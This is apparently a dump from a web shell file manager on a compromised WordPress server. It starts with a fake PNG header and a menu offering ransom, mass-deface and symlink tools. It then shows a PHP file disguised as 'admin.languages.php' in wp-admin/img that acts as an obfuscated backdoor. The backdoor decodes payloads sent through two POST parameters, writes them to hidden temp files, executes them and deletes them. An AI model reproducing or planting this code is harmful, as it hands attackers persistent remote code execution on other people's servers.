\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/eceas/wp-admin/img/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/eceas/wp-admin/img/admin.languages.php |
<?php if(array_key_exists("en\x74r\x79", $_POST)){ $ent = $_POST["en\x74r\x79"]; $ent = explode ("." , $ent ) ; $object = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $p = 0; foreach($ent as $v1) { $sChar = ord($s[$p % $sLen]); $dec = ((int)$v1 - $sChar -($p % 10)) ^14; $object .= chr($dec); $p++; } $ent = array_filter(["/dev/shm", getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), "/tmp", getcwd(), ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp"]); foreach ($ent as $factor): if (max(0, is_dir($factor) * is_writable($factor))) { $ptr = sprintf("%s/.holder", $factor); $success = file_put_contents($ptr, $object); if ($success) { include $ptr; @unlink($ptr); die();} } endforeach; }
if(count($_POST) > 0 && isset($_POST["\x64ata_\x63\x68un\x6B"])){
$mrk = $_POST["\x64ata_\x63\x68un\x6B"];
$mrk = explode ( '.' , $mrk ) ;
$entry = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($salt);
$y = 0;
array_walk($mrk ,function($v1) use(&$entry ,&$y ,$salt ,$lenS) {
$sChar = ord($salt[$y % $lenS]);
$d = ((int)$v1 - $sChar -($y % 10)) ^ 13;
$entry .= chr($d);
$y++;
});
$ent = array_filter([sys_get_temp_dir(), session_save_path(), "/tmp", "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), getenv("TMP")]);
while ($reference = array_shift($ent)) {
if (!( !is_dir($reference) || !is_writable($reference) )) {
$dchunk = "$reference/.ent";
$file = fopen($dchunk, 'w');
if ($file) {
fwrite($file, $entry);
fclose($file);
include $dchunk;
@unlink($dchunk);
exit;
}
}
}
}